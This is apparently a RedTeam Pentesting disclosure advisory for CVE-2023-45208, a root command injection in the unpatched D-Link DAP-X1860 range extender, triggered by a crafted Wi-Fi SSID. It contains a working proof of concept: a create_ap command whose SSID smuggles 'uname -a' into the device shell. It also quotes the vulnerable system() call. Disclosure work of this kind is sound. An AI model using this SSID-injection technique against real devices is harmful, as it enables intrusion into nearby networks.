The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.

Details

Product: D-Link DAP-X1860 Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too Fixed Versions: Not fixed Vulnerability Type: Command Injection Security Risk: medium Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender Vendor Status: notified, not responding Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006 Advisory Status: published CVE: CVE-2023-45208 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208

Introduction

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.

More Details

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network with a single tick (such as `Olaf’s Network`) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:

---

Error 500: Internal Server Error CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 7 11b/g/n NONE In 17 YES NO 1 1 ***** **:**:**:**:**:** WPA2PSK/AES 24 11b/g/n NONE In 13 YES NO 2 1 ***** **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 13 YES NO 3 1 ***** **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES 81 11b/g/n NONE In 7 YES NO 4 1 ***** **:**:**:**:**:** WPA2PSKWPA3PSK/AES 63 11b/g/n/ax NONE In 19 YES NO 5 1 ***** **:**:**:**:**:** WPA2PSK/AES 44 11b/g/n/ax NONE In 5 NO NO 6 1 Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO sh: 7: not found sh

---

The output `sh: 7: not found` indicates that the extender attempted to execute some command and the single tick that was originally present in the Wi-Fi network `Olaf’s Network` is missing in the output. Additionally, the sixth line does not have the same alignment of spaces compared to the other lines.

This alone can be exploited as a denial-of-service-vulnerability as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command `uname -a` which lists general kernel information. To do this, a Wi-Fi network within range was created with a SSID starting with a single tick and the command separated by the logical shell operator "&&". The network was started using create_ap [1]:

---

$ create_ap -n wlan0 “Test’ && uname -a &&” randompw98zwrd8g283d3

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:

---

Error 500: Internal Server Error CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 0 11b/g/n NONE In 17 YES NO 1 1 Test Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux sh: **:**:**:**:**:**: not found sh: 2: not found sh: 3: not found sh: 4: not found […] sh: 40: not

---

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user.

The vulnerability originates from the `parsing_xml_stasurvey` function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

---

[…] snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info); system(acStack_1a0); […]

---

Proof of Concept

Create a Wi-Fi network with an SSID containing a single tick, followed by some shell command separator, e.g. “&&” and the command to be run. In the following, create_ap[1] was used to create the Wi-Fi network:

---

$ create_ap -n wlan0 “Test’ && uname -a &&” random98zwrd8g283d3

To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender’s web interface.

Security Risk

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender’s local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender such that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.

Timeline

2023-05-06 Vulnerability identified 2023-05-08 Reported to [email protected] 2023-06-19 After receiving no reply, a reminder was sent to [email protected] 2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly 2023-08-07 After again receiving no reply, another reminder sent to [email protected] 2023-10-05 CVE ID requested 2023-10-05 CVE ID assigned 2023-10-09 Advisory released

References

[1]: https://github.com/oblique/create_ap

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/